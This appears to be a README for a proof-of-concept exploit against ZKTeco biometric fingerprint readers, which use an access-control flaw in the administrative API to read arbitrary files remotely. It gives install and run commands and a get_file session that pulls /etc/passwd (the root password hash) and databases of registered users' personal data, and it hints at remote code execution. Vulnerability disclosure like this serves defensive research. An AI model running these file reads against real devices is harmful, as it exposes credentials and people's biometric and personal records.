
Zero-day Vulnerability in ZKTEco biometric fingerprint reader.


Incorrect Access Control in ZKTECO allows remote attackers to read any file via the administrative API.

Installing required modules

  • Inside the directory ZKTEco:
    $ pip install -r ./pyzatt/requirements_dev.txt

Running the exploit

  • Inside the directory ZKTEco:
    $ python exploit.py <ip_address>
    Connected to
    (Cmd) get_file <file_name>
    get_file /etc/passwd: discloses the root password's hash.
    get_file /mnt/mtdblock/data/ZKDB.db: discloses PII of registered users. To read the full contents, you may need to run this command repeatedly until the whole file has been disclosed.
    get_file /mnt/mtdblock/data/ZKSystem.db: discloses sensitive information related to the system.



The devices may also be vulnerable to remote code execution through the administrative API. The exploit mentioned in the credits section could be a good place to find a test for it.